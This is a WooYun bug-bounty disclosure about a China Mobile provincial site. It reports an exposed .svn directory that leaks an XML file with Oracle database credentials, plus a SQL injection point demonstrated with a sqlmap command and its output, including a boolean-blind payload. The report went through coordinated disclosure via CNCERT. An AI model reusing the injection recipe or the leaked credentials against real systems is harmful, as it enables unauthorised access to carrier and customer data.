当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153866

漏洞标题:运营商安全之中国移动某省营业厅注入+某分站漏洞或影响数据库

相关厂商:中国移动

漏洞作者: 李旭敏

提交时间:2015-11-18 11:28

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-18: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

以前找到的一直没提,攒着快发霉了。。

详细说明:

http://**.**.**.**/tools/.svn/entries
存在svn泄漏
得知

http://**.**.**.**/tools/test.xml


访问后

<Sql>
select (select org.short_name from BASE_ORGANIZATION org where org.code_=s1.t1) as t1,sum(s2.t1) as t2,sum(s2.t2) as t3,sum(s2.t3) as t4 from (select substr(o.code_,0,4) as t1 from BASE_ORGANIZATION o left join user_info u on **.**.**.**_id=**.**.**.**_id group by substr(o.code_,0,4)) s1 left join (select count(*) t1,sum(visitcount) t2,sum(logincount) t3,substr(o.code_,0,4) t4 from BASE_ORGANIZATION o left join user_info u on **.**.**.**_id=**.**.**.**_id group by substr(o.code_,0,4),visitcount,logincount) s2 on s1.t1=s2.t4 group by s1.t1 order by t1 desc
</Sql>
<Connection>
<Driver>oracle.jdbc.driver.OracleDriver</Driver>
<User>gcbicp</User>
<Password>aspire_gcbicp</Password>
<Url>jdbc:oracle:thin:@**.**.**.**:7233:orcl</Url>
</Connection>


1.png


漏洞证明:

注入点:

sqlmap.py -u "**.**.**.**:8080/actionDispatcher.do" --data="reqUrl=XDXMYQry&busiNum=XDXMY&queryAreaNum=XDXMY_HZXN" -p busiNum


2.png


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: busiNum (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: reqUrl=XDXMYQry&busiNum=XDXMY' AND 2996=2996 AND 'LqJf'='LqJf&queryAreaNum=XDXMY_HZXN
---
[16:51:05] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[16:51:05] [INFO] fetching current user
[16:51:05] [INFO] resumed: XWECP1
current user: 'XWECP1'


测试不是误报,但是跑的时候不知道为什么非常卡,跑不出数据库名,但是可以执行其他命令。
是中国移动江苏营业厅的注入。。。

修复方案:

版权声明:转载请注明来源 李旭敏@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-24 14:36

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无